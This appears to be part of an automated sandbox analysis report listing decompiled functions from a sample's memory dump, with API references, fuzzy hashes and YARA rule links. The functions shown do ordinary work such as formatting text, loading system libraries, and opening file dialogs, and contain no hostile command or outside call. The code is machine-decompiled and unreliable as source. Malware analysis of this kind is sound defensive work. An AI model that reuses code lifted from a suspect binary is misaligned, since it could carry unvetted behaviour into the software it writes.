Opcode Fuzzy Hash: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
Instruction Fuzzy Hash: B8E092722407006BE22197398DC9FABB2EC9FC9761F11053EF504E7280DBB8DC014669

Uniqueness

Uniqueness Score: -1.00%

Function 0040B6A6, Relevance: 6.0, APIs: 4, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E0040B6A6() {
				intOrPtr _t1;
				intOrPtr _t2;
				intOrPtr _t3;
				intOrPtr _t4;

				_t1 =  *0x41c458;
				if(_t1 != 0) {
					_push(_t1);
					L0040B272();
				}
				_t2 =  *0x41c460;
				if(_t2 != 0) {
					_push(_t2);
					L0040B272();
				}
				_t3 =  *0x41c45c;
				if(_t3 != 0) {
					_push(_t3);
					L0040B272();
				}
				_t4 =  *0x41c464;
				if(_t4 != 0) {
					_push(_t4);
					L0040B272();
					return _t4;
				}
				return _t4;
			}

0x0040b6a6
0x0040b6ad
0x0040b6af
0x0040b6b0
0x0040b6b5
0x0040b6b6
0x0040b6bd
0x0040b6bf
0x0040b6c0
0x0040b6c5
0x0040b6c6
0x0040b6cd
0x0040b6cf
0x0040b6d0
0x0040b6d5
0x0040b6d6
0x0040b6dd
0x0040b6df
0x0040b6e0
0x00000000
0x0040b6e5
0x0040b6e6

APIs

??3@YAXPAX@Z.MSVCRT ref: 0040B6B0
??3@YAXPAX@Z.MSVCRT ref: 0040B6C0
??3@YAXPAX@Z.MSVCRT ref: 0040B6D0
??3@YAXPAX@Z.MSVCRT ref: 0040B6E0

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
Instruction ID: 3bd5cb9a150004800b4bedd87e83f43d671674f7d7a0a5890c52a9af046e0154
Opcode Fuzzy Hash: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
Instruction Fuzzy Hash: 96E00261B8820196DD249A7AACD5D6B239C9A05794314847EF804E72E5DF39D44045ED

Uniqueness

Uniqueness Score: -1.00%

Function 00407362, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00407362(void* __ebx, void* __edx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				wchar_t* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				void* __edi;
				signed int _t39;
				wchar_t* _t41;
				signed int _t45;
				signed int _t48;
				wchar_t* _t53;
				wchar_t* _t62;
				void* _t66;
				intOrPtr* _t68;
				void* _t70;
				wchar_t* _t75;
				wchar_t* _t79;

				_t66 = __ebx;
				_t75 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
					do {
						_t39 =  *( *((intOrPtr*)(_t66 + 0x30)) + _v8 * 4);
						_t68 = _a8;
						if(_t68 != _t75) {
							_t79 =  *((intOrPtr*)( *_t68))(_t39,  *((intOrPtr*)(_t66 + 0x60)));
						} else {
							_t79 =  *( *((intOrPtr*)(_t66 + 0x2d4)) + 0x10 + _t39 * 0x14);
						}
						_t41 = wcschr(_t79, 0x2c);
						_pop(_t70);
						if(_t41 != 0) {
							L8:
							_v20 = _t75;
							_v28 = _t75;
							_v36 = _t75;
							_v24 = 0x100;
							_v32 = 1;
							_v16 = 0x22;
							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
							while(1) {
								_t45 =  *_t79 & 0x0000ffff;
								__eflags = _t45;
								_v12 = _t45;
								_t77 =  &_v36;
								if(__eflags == 0) {
									break;
								}
								__eflags = _t45 - 0x22;
								if(__eflags != 0) {
									_push( &_v12);
									_t48 = 1;
									__eflags = 1;
								} else {
									_push(L"\"\"");
									_t48 = _t45 | 0xffffffff;
								}
								E0040565D(_t48, _t70, _t77, __eflags);
								_t79 =  &(_t79[0]);
								__eflags = _t79;
							}
							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
							_t53 = _v20;
							__eflags = _t53;
							if(_t53 == 0) {
								_t53 = 0x40c4e8;
							}
							E004055D1(E00407343(_t66, _a4, _t53),  &_v36);
							_t75 = 0;
							__eflags = 0;
						} else {
							_t62 = wcschr(_t79, 0x22);
							_pop(_t70);
							if(_t62 != 0) {
								goto L8;
							} else {
								E00407343(_t66, _a4, _t79);
							}
						}
						if(_v8 <  *((intOrPtr*)(_t66 + 0x2c)) - 1) {
							E00407343(_t66, _a4, ",");
						}
						_v8 = _v8 + 1;
					} while (_v8 <  *((intOrPtr*)(_t66 + 0x2c)));
				}
				return E00407343(_t66, _a4, L"\r\n");
			}

0x00407362
0x00407369
0x0040736e
0x00407371
0x00407378
0x0040737e
0x00407381
0x00407386
0x0040739f
0x00407388
0x00407391
0x00407391
0x004073a4
0x004073ac
0x004073ad
0x004073cd
0x004073d0
0x004073d3
0x004073d6
0x004073e0
0x004073e7
0x004073ee
0x004073f5
0x0040741a
0x0040741a
0x0040741d
0x00407420
0x00407423
0x00407426
0x00000000
0x00000000
0x004073fc
0x00407400
0x0040740f
0x00407412
0x00407412
0x00407402
0x00407402
0x00407407
0x00407407
0x00407413
0x00407419
0x00407419
0x00407419
0x0040742f
0x00407434
0x00407437
0x00407439
0x0040743b
0x0040743b
0x0040744e
0x00407453
0x00407453
0x004073af
0x004073b2
0x004073ba
0x004073bb
0x00000000
0x004073bd
0x004073c3
0x004073c3
0x004073bb
0x0040745c
0x00407468
0x00407468
0x0040746d
0x00407473
0x0040747c
0x0040748e

APIs

wcschr.MSVCRT ref: 004073A4
wcschr.MSVCRT ref: 004073B2

Part of subcall function 0040565D: wcslen.MSVCRT ref: 00405679
Part of subcall function 0040565D: memcpy.MSVCRT ref: 0040569D

Strings

", xrefs: 004073EE

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: wcschr$memcpywcslen
String ID: "
API String ID: 1983396471-123907689
Opcode ID: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
Instruction ID: 00b3f0686b04e7c82e40785714242b478475f00d1c6093d835cc4068bab83974
Opcode Fuzzy Hash: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
Instruction Fuzzy Hash: 4E315F31E04208ABDF10EFA5C8819AE7BB9EF54314F20457BEC50B72C2D778AA41DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00401676, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E00401676(void* __ecx, intOrPtr* __esi, void* __eflags, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				char _v80;
				signed short _v65616;
				void* _t27;
				intOrPtr _t28;
				void* _t34;
				intOrPtr _t39;
				intOrPtr* _t51;
				void* _t52;

				_t51 = __esi;
				E0040B550(0x1004c, __ecx);
				_t39 = 0;
				_push(0);
				_push( &_v8);
				_v8 =  *((intOrPtr*)(_a4 + 0x1c));
				_push(L"Lines");
				_t27 =  *((intOrPtr*)( *__esi))();
				if(_v8 > 0) {
					do {
						_t6 = _t39 + 1; // 0x1
						_t28 = _t6;
						_push(_t28);
						_push(L"Line%d");
						_v12 = _t28;
						_push(0x1f);
						_push( &_v80);
						L0040B1EC();
						_t52 = _t52 + 0x10;
						_push(0x7fff);
						_push(0x40c4e8);
						if( *((intOrPtr*)(_t51 + 4)) == 0) {
							_v65616 = _v65616 & 0x00000000;
							 *((intOrPtr*)( *_t51 + 0x10))( &_v80,  &_v65616);
							_t34 = E004054DF(_a4, _t51,  &_v65616);
						} else {
							_t34 =  *((intOrPtr*)( *_t51 + 0x10))( &_v80, E00405581(_a4, _t39));
						}
						_t39 = _v12;
					} while (_t39 < _v8);
					return _t34;
				}
				return _t27;
			}

0x00401676
0x0040167e
0x0040168a
0x0040168c
0x00401690
0x00401691
0x00401696
0x0040169d
0x004016a2
0x004016aa
0x004016aa
0x004016aa
0x004016ad
0x004016ae
0x004016b3
0x004016b9
0x004016bb
0x004016bc
0x004016c1
0x004016c8
0x004016cd
0x004016ce
0x004016ea
0x004016ff
0x0040170c
0x004016d0
0x004016e3
0x004016e3
0x00401711
0x00401714
0x00000000
0x00401719
0x0040171c

APIs

_snwprintf.MSVCRT ref: 004016BC

Strings

Line%d, xrefs: 004016AE
Lines, xrefs: 00401696

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintf
String ID: Line%d$Lines
API String ID: 3988819677-2790224864
Opcode ID: c1f721086df18e7d6bb8eccb45024a01d2e3fe78f3e8b8c51705c1ae483569b9
Instruction ID: 1021665491e9d2d06496d958327cd8fefc515fbb55266dd5f91e98284186a054
Opcode Fuzzy Hash: c1f721086df18e7d6bb8eccb45024a01d2e3fe78f3e8b8c51705c1ae483569b9
Instruction Fuzzy Hash: 4C110071A00208EFCB15DF98C8C1D9EB7B9EF48704F1045BAF645E7281D778AA458B68

Uniqueness

Uniqueness Score: -1.00%

Function 0040512F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E0040512F(intOrPtr _a4, intOrPtr _a8, void* _a12) {
				void* _v8;
				void* _v26;
				void _v28;
				void* _t24;
				void* _t25;
				void* _t35;
				signed int _t38;
				signed int _t42;
				void* _t44;
				void* _t45;

				_t24 = _a12;
				_t45 = _t44 - 0x18;
				_t42 = 0;
				 *_t24 = 0;
				if(_a8 <= 0) {
					_t25 = 0;
				} else {
					_t38 = 0;
					_t35 = 0;
					if(_a8 > 0) {
						_v8 = _t24;
						while(1) {
							_v28 = _v28 & 0x00000000;
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosw");
							_push( *(_t35 + _a4) & 0x000000ff);
							_push(L"%2.2X ");
							_push(0xa);
							_push( &_v28);
							L0040B1EC();
							_t38 = _t42;
							memcpy(_v8,  &_v28, 6);
							_t13 = _t42 + 3; // 0x3
							_t45 = _t45 + 0x1c;
							if(_t13 >= 0x2000) {
								break;
							}
							_v8 = _v8 + 6;
							_t35 = _t35 + 1;
							_t42 = _t42 + 3;
							if(_t35 < _a8) {
								continue;
							}
							break;
						}
						_t24 = _a12;
					}
					 *(_t24 + 4 + _t38 * 2) =  *(_t24 + 4 + _t38 * 2) & 0x00000000;
					_t25 = 1;
				}
				return _t25;
			}

0x00405132
0x00405135
0x00405139
0x0040513e
0x00405141
0x004051b3
0x00405143
0x00405145
0x00405147
0x0040514c
0x0040514e
0x00405151
0x00405151
0x0040515b
0x0040515c
0x0040515d
0x0040515e
0x0040515f
0x00405168
0x00405169
0x00405171
0x00405173
0x00405174
0x00405182
0x00405184
0x00405189
0x0040518c
0x00405194
0x00000000
0x00000000
0x00405196
0x0040519a
0x0040519b
0x004051a1
0x00000000
0x00000000
0x00000000
0x004051a1
0x004051a3
0x004051a3
0x004051a6
0x004051af
0x004051b0
0x004051b7

APIs

_snwprintf.MSVCRT ref: 00405174
memcpy.MSVCRT ref: 00405184

Strings

%2.2X , xrefs: 00405169

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintfmemcpy
String ID: %2.2X
API String ID: 2789212964-323797159
Opcode ID: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
Instruction ID: b76e4bbe2d26c53343c630e3245d096d82678977124e835a89109146ed91de65
Opcode Fuzzy Hash: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
Instruction Fuzzy Hash: 5A11A532900608BFEB01DFE8C882AAF77B9FB45314F104477ED14EB141D6789A058BD5

Uniqueness

Uniqueness Score: -1.00%

Function 004075BB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E004075BB(void* __ebx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				char _v44;
				intOrPtr _t22;
				signed int _t30;
				signed int _t34;
				void* _t35;
				void* _t36;

				_t35 = __esi;
				_t34 = 0;
				if( *((intOrPtr*)(__esi + 0x2c)) > 0) {
					do {
						_t30 =  *( *((intOrPtr*)(__esi + 0x30)) + _t34 * 4);
						_t22 =  *((intOrPtr*)(_t30 * 0x14 +  *((intOrPtr*)(__esi + 0x40)) + 0xc));
						L0040B1EC();
						_push( *((intOrPtr*)( *_a8))(_t30,  *((intOrPtr*)(__esi + 0x64)),  &_v44, 0x14, L"%%-%d.%ds ", _t22, _t22));
						_push( &_v44);
						_push(0x2000);
						_push( *((intOrPtr*)(__esi + 0x60)));
						L0040B1EC();
						_t36 = _t36 + 0x24;
						E00407343(__esi, _a4,  *((intOrPtr*)(__esi + 0x60)));
						_t34 = _t34 + 1;
					} while (_t34 <  *((intOrPtr*)(__esi + 0x2c)));
				}
				return E00407343(_t35, _a4, L"\r\n");
			}

0x004075bb
0x004075c2
0x004075c7
0x004075ca
0x004075cd
0x004075d8
0x004075e9
0x004075fc
0x00407600
0x00407601
0x00407606
0x00407609
0x0040760e
0x00407619
0x0040761e
0x0040761f
0x00407624
0x00407636

APIs

_snwprintf.MSVCRT ref: 004075E9
_snwprintf.MSVCRT ref: 00407609

Strings

%%-%d.%ds , xrefs: 004075DE

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintf
String ID: %%-%d.%ds
API String ID: 3988819677-2008345750
Opcode ID: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
Instruction ID: ecb877ded915dbad8d5af0e436ed4e240226c92ce5a1c47ab2288d53f8dcf9da
Opcode Fuzzy Hash: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
Instruction Fuzzy Hash: BC01B931600704AFD7109F69CC82D5A77ADFF48304B004439FD86B7292D635F911DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040507A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040507A(intOrPtr __eax, wchar_t* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				wchar_t* _v52;
				intOrPtr _v56;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v76;
				struct tagOFNA _v80;

				_v76 = __eax;
				_v68 = _a4;
				_v64 = 0;
				_v44 = 0;
				_v36 = 0;
				_v32 = _a8;
				_v20 = _a12;
				_v80 = 0x4c;
				_v56 = 1;
				_v52 = __esi;
				_v48 = 0x104;
				_v28 = 0x81804;
				if(GetOpenFileNameW( &_v80) == 0) {
					return 0;
				} else {
					wcscpy(__esi, _v52);
					return 1;
				}
			}

0x00405080
0x00405086
0x0040508b
0x0040508e
0x00405091
0x00405097
0x0040509d
0x004050a4
0x004050ab
0x004050b2
0x004050b5
0x004050bc
0x004050cb
0x004050e0
0x004050cd
0x004050d1
0x004050dc
0x004050dc

APIs

GetOpenFileNameW.COMDLG32(?), ref: 004050C3
wcscpy.MSVCRT ref: 004050D1

Strings

L, xrefs: 004050A4

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: FileNameOpenwcscpy
String ID: L
API String ID: 3246554996-2909332022
Opcode ID: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
Instruction ID: bc55e530e402ba4b599a228f817f204aa1fc4279979982f23bca087f07049b97
Opcode Fuzzy Hash: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
Instruction Fuzzy Hash: 9A015FB1D102199FDF40DFA9D885ADEBBF4BB08304F14812AE915F6240E77495458F98

Uniqueness

Uniqueness Score: -1.00%

Function 0040906D, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040906D(struct HINSTANCE__** __eax, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				void* __esi;
				_Unknown_base(*)()* _t10;
				void* _t12;
				struct HINSTANCE__** _t13;

				_t13 = __eax;
				_t12 = 0;
				if(E00408F72(__eax) != 0) {
					_t10 = GetProcAddress( *_t13, "LookupAccountSidW");
					if(_t10 != 0) {
						_t12 =  *_t10(0, _a4, _a8, _a12, _a16, _a20, _a24);
					}
				}
				return _t12;
			}

0x00409072
0x00409074
0x0040907d
0x00409086
0x0040908e
0x004090a5
0x004090a5
0x0040908e
0x004090ac

APIs

GetProcAddress.KERNEL32(?,LookupAccountSidW), ref: 00409086

Strings

LookupAccountSidW, xrefs: 0040907F
Y@, xrefs: 0040906D

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc
String ID: LookupAccountSidW$Y@
API String ID: 190572456-2352570548
Opcode ID: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
Instruction ID: 3ebfd29b958db2e29df2983e37ea976ab6b1d16e8490ad6d4f073a9de280f7a1
Opcode Fuzzy Hash: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
Instruction Fuzzy Hash: F5E0E537100109BBDF125E96DD01CAB7AA79F84750B144035FA54E1161D6368821A794

Uniqueness

Uniqueness Score: -1.00%

Function 0040AD85, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E0040AD85(intOrPtr _a4) {
				_Unknown_base(*)()* _t3;
				void* _t7;
				struct HINSTANCE__* _t8;
				char** _t9;

				_t7 = 0;
				_t8 = E00405436(L"shlwapi.dll");
				 *_t9 = "SHAutoComplete";
				_t3 = GetProcAddress(_t8, ??);
				if(_t3 != 0) {
					_t7 =  *_t3(_a4, 0x10000001);
				}
				FreeLibrary(_t8);
				return _t7;
			}

0x0040ad8c
0x0040ad93
0x0040ad95
0x0040ad9d
0x0040ada5
0x0040adb2
0x0040adb2
0x0040adb5
0x0040adbf

APIs

Part of subcall function 00405436: memset.MSVCRT ref: 00405456
Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492

GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5

Strings

shlwapi.dll, xrefs: 0040AD87

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Library$Load$AddressFreeProcmemsetwcscat
String ID: shlwapi.dll
API String ID: 4092907564-3792422438
Opcode ID: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
Instruction ID: 3ba04cc2888c968bb17b12a51753cff707eeab9003a5d350ca2caef87bad7666
Opcode Fuzzy Hash: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
Instruction Fuzzy Hash: E1D01235211111EBD7616B66AD44A9F7AA6DFC1351B060036F544F2191DB3C4846C669

Uniqueness

Uniqueness Score: -1.00%

Function 00406597, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406597(wchar_t* __esi) {
				wchar_t* _t2;
				wchar_t* _t6;

				_t6 = __esi;
				E00404AD9(__esi);
				_t2 = wcsrchr(__esi, 0x2e);
				if(_t2 != 0) {
					 *_t2 =  *_t2 & 0x00000000;
				}
				return wcscat(_t6, L"_lng.ini");
			}

0x00406597
0x00406598
0x004065a0
0x004065aa
0x004065ac
0x004065ac
0x004065bd

APIs

Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4

wcsrchr.MSVCRT ref: 004065A0
wcscat.MSVCRT ref: 004065B6

Strings

_lng.ini, xrefs: 004065B0

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: FileModuleNamewcscatwcsrchr
String ID: _lng.ini
API String ID: 383090722-1948609170
Opcode ID: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
Instruction ID: e4456dc4ef972d75cd366ed24565615e7e819105f92635e6590d4ece6e8d8120
Opcode Fuzzy Hash: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
Instruction Fuzzy Hash: 16C01292682620A4E2223322AC03B4F1248CF62324F21407BF906381C7EFBD826180EE

Uniqueness

Uniqueness Score: -1.00%

Function 0040AC52, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040AC52() {
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t2;

				if( *0x4101c4 == 0) {
					_t1 = E00405436(L"shell32.dll");
					 *0x4101c4 = _t1;
					if(_t1 != 0) {
						_t2 = GetProcAddress(_t1, "SHGetSpecialFolderPathW");
						 *0x4101c0 = _t2;
						return _t2;
					}
				}
				return _t1;
			}

0x0040ac59
0x0040ac60
0x0040ac68
0x0040ac6d
0x0040ac75
0x0040ac7b
0x00000000
0x0040ac7b
0x0040ac6d
0x0040ac80

APIs

Part of subcall function 00405436: memset.MSVCRT ref: 00405456
Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492

GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0040AC75

Strings

SHGetSpecialFolderPathW, xrefs: 0040AC6F
shell32.dll, xrefs: 0040AC5B

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad$AddressProcmemsetwcscat
String ID: SHGetSpecialFolderPathW$shell32.dll
API String ID: 946536540-880857682
Opcode ID: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
Instruction ID: 297d67d15b42b64e279660486abf15c243c4c6a8dcafd005a32ae5f28444c9d4
Opcode Fuzzy Hash: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
Instruction Fuzzy Hash: 9AD0C9B0D8A301ABE7106BB0AF05B523AA4B704301F12417BF800B12E0DBBE90888A1E

Uniqueness

Uniqueness Score: -1.00%

Function 00406670, Relevance: 5.1, APIs: 4, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00406670(char** __esi, void* __eflags) {
				char* _t30;
				char** _t39;

				_t39 = __esi;
				 *__esi = "cf@";
				__esi[0xb8] = 0;
				_t30 = E00404FA4(0x338, __esi);
				_push(0x14);
				__esi[0xcb] = 0;
				__esi[0xa6] = 0;
				__esi[0xb9] = 0;
				__esi[0xba] = 0xfff;
				__esi[8] = 0;
				__esi[1] = 0;
				__esi[0xb7] = 1;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[2] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[3] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[4] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_t39[5] = _t30;
				return _t39;
			}

0x00406670
0x0040667a
0x00406680
0x00406686
0x0040668b
0x0040668d
0x00406693
0x00406699
0x0040669f
0x004066a9
0x004066ac
0x004066af
0x004066b9
0x004066c7
0x004066d9
0x004066c9
0x004066c9
0x004066cc
0x004066cf
0x004066d2
0x004066d5
0x004066d5
0x004066db
0x004066dd
0x004066e0
0x004066e8
0x004066fa
0x004066ea
0x004066ea
0x004066ed
0x004066f0
0x004066f3
0x004066f6
0x004066f6
0x004066fc
0x004066fe
0x00406701
0x00406709
0x0040671b
0x0040670b
0x0040670b
0x0040670e
0x00406711
0x00406714
0x00406717
0x00406717
0x0040671d
0x0040671f
0x00406722
0x0040672a
0x0040673c
0x0040672c
0x0040672c
0x0040672f
0x00406732
0x00406735
0x00406738
0x00406738
0x0040673f
0x00406745

APIs

Part of subcall function 00404FA4: memset.MSVCRT ref: 00404FB2

??2@YAPAXI@Z.MSVCRT ref: 004066B9
??2@YAPAXI@Z.MSVCRT ref: 004066E0
??2@YAPAXI@Z.MSVCRT ref: 00406701
??2@YAPAXI@Z.MSVCRT ref: 00406722

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

